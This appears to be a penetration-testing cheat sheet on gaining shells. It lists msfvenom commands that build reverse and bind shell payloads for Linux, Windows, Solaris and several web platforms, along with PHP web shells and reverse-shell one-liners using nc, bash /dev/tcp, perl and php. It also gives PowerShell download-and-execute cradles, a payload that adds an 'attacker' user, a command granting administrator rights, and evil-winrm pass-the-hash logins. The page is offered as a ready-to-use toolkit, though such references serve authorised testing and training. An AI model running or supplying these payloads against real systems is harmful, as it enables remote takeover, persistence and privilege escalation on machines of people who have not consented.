Shells
Last updated
Locate and upload the appropriate shell from - /usr/share/webshells
nc -nlvp 80
nc -nlvp 443
nc -nlvp 3000
nc -nlvp 4444
nc -nlvp 8080
shell/reverse_tcp = staged payload
shell_reverse_tcp = unstaged payload
Note that a staged payload requires a Metasploit listener (exploit/multi/handler) to send the second stage of the payload; a plain nc listener only works with unstaged payloads
32-bit Systems -
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x86.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x86.elf
64-bit Systems -
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x64.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf > shell-x64.elf
32-bit Systems -
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
msfvenom -p linux/x86/shell/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
msfvenom -p linux/x86/shell_bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
64-bit Systems -
msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
msfvenom -p linux/x64/shell/bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
msfvenom -p linux/x64/shell_bind_tcp RHOST=<IP> LPORT=<port> -f elf > bind.elf
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
32-bit Systems -
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x86.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x86.exe
64-bit Systems -
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x64.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe > shell-x64.exe
32-bit Systems -
msfvenom -p windows/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/meterpreter_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/shell/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
64-bit Systems -
msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/x64/shell/bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/x64/shell_bind_tcp RHOST=<IP> LPORT=<port> -f exe > bind.exe
msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
msfvenom -a [ x86 | x64 ] --platform Windows -p windows/exec CMD="<powershell | cmd command>" -f exe > payload.exe
Examples -
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://<IP>/<payload>')\"" -f exe > payload.exe
msfvenom -a x86 --platform Windows -p windows/exec CMD="net localgroup administrators <username> /add" -f exe > payload.exe
Launch msfconsole - sudo msfconsole
Run the following -
use exploit/multi/handler
set PAYLOAD <payload>
set LHOST <attacker IP>
set LPORT <attacker listening port>
run
Web Shells -
<?php system($_GET['cmd']); ?>
<?php system($_REQUEST["cmd"]); ?>
Reverse Shells -
<?php system('nc.exe -e cmd.exe <attacker IP> <port>') ?>
msfvenom -p php/meterpreter_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
php -r '$sock=fsockopen("<attacker IP>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
Web Shells -
/usr/share/webshells/aspx/cmdasp.aspx
/usr/share/webshells/aspx/shell.aspx
# Modify shell.aspx variables, string host, and int port
Reverse Shells -
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<port> -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<port> -f aspx > reverse.aspx
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f raw > reverse.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<port> -f war > reverse.war
msfvenom -p nodejs/shell_reverse_tcp LHOST=<attacker IP> LPORT=<port>
evil-winrm -i <ip> -u <username> -p <password>
evil-winrm -i <ip> -u <username> -H <NTLM hash>
# Verify usability with: crackmapexec winrm <ip>
# Look for port 5985 in nmap scans
> Use the download command to download files while in an evil-winrm session
# download /relative/file/path/<filename>
> Use the upload command to upload files while in an evil-winrm session
# upload /relative/file/path/<filename>
Download payload:
powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>/powercat.ps1')
Initiate reverse shell:
powercat -c <IP> -p <Port> -e powershell
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<port> -f raw > reverse.pl
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<port> -f raw > reverse.py
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP>:<Kali port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Create a .sh file and write the following
#!/bin/bash
/bin/bash -c "bash -i >& /dev/tcp/192.168.45.200/9090 0>&1"
nc -nv <IP> <port> -e /bin/bash
nc -nv <IP> <port> -e /bin/sh
nc -nv <IP> <port> -c /bin/bash
nc -nv <IP> <port> -c /bin/sh
nc64.exe <IP> <port> -e cmd
nc64.exe <IP> <port> -e powershell
nc64.exe <IP> <port> -t -e cmd
nc64.exe <IP> <port> -t -e powershell